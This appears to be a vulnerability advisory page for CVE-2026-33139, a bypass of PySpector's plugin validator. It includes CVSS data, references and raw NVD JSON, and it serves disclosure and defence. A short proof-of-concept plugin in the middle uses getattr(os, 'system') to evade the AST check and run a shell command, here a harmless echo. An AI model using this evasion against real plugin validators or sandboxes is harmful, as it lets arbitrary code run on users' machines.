CVE-2026-33139

Description

PySpector is a static analysis security testing (SAST) Framework engineered for modern Python development workflows. PySpector versions 0.1.6 and prior are affected by a security validation bypass in the plugin system. The validate_plugin_code() function in plugin_system.py, performs static AST analysis to block dangerous API calls before a plugin is trusted and executed. However, the internal resolve_name() helper only handles ast.Name and ast.Attribute node types, returning None for all others. When a plugin uses indirect function calls via getattr() (such as getattr(os, 'system')) the outer call's func node is of type ast.Call, causing resolve_name() to return None, and the security check to be silently skipped. The plugin incorrectly passes the trust workflow, and executes arbitrary system commands on the user's machine when loaded. This issue has been patched in version 0.1.7.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:parzivalhack:pyspector:*:*:*:*:*:python:*:* - VULNERABLE

PySpector <= 0.1.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Malicious PySpector plugin example
# This PoC bypasses AST validation by using indirect calls via getattr

import os

# The validator's resolve_name() fails on ast.Call nodes inside func.
# Using getattr() creates such a node, causing the check to be skipped.

# Indirectly resolve the dangerous function
system_func = getattr(os, 'system')

# Execute arbitrary command
cmd = 'echo "CVE-2026-33139 POC Success"'
system_func(cmd)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33139
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33139
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33139/
[4] VulDB https://vuldb.com/cve/CVE-2026-33139
[5] https://github.com/ParzivalHack/PySpector/security/advisories/GHSA-v3xv-8vc3-h2m6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33139", "sourceIdentifier": "[email protected]", "published": "2026-03-20T20:16:48.917", "lastModified": "2026-03-24T15:06:10.547", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PySpector is a static analysis security testing (SAST) Framework engineered for modern Python development workflows. PySpector versions 0.1.6 and prior are affected by a security validation bypass in the plugin system. The validate_plugin_code() function in plugin_system.py, performs static AST analysis to block dangerous API calls before a plugin is trusted and executed. However, the internal resolve_name() helper only handles ast.Name and ast.Attribute node types, returning None for all others. When a plugin uses indirect function calls via getattr() (such as getattr(os, 'system')) the outer call's func node is of type ast.Call, causing resolve_name() to return None, and the security check to be silently skipped. The plugin incorrectly passes the trust workflow, and executes arbitrary system commands on the user's machine when loaded. This issue has been patched in version 0.1.7."}, {"lang": "es", "value": "PySpector es un framework de pruebas de seguridad de análisis estático (SAST) diseñado para flujos de trabajo de desarrollo de Python modernos. Las versiones 0.1.6 y anteriores de PySpector están afectadas por una omisión de validación de seguridad en el sistema de plugins. La función validate_plugin_code() en plugin_system.py, realiza un análisis AST estático para bloquear llamadas peligrosas a la API antes de que un plugin sea confiable y ejecutado. Sin embargo, la función auxiliar interna resolve_name() solo maneja los tipos de nodo ast.Name y ast.Attribute, devolviendo None para todos los demás. Cuando un plugin utiliza llamadas a funciones indirectas a través de getattr() (como getattr(os, 'system')) el nodo func de la llamada externa es de tipo ast.Call, lo que provoca que resolve_name() devuelva None, y que la comprobación de seguridad se omita silenciosamente. El plugin pasa incorrectamente el flujo de trabajo de confianza y ejecuta comandos de sistema arbitrarios en la máquina del usuario cuando se carga. Este problema ha sido parcheado en la versión 0.1.7."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-184"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:parzivalhack:pyspector:*:*:*:*:*:python:*:*", "versionEndExcluding": "0.1.7", "matchCriteriaId": "1C1B240D-CB1E-449D-8AB2-83C1E9D6B316"}]}]}], "references": [{"url": "https://github.com/ParzivalHack/PySpector/security/advisories/GHSA-v3xv-8vc3-h2m6", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}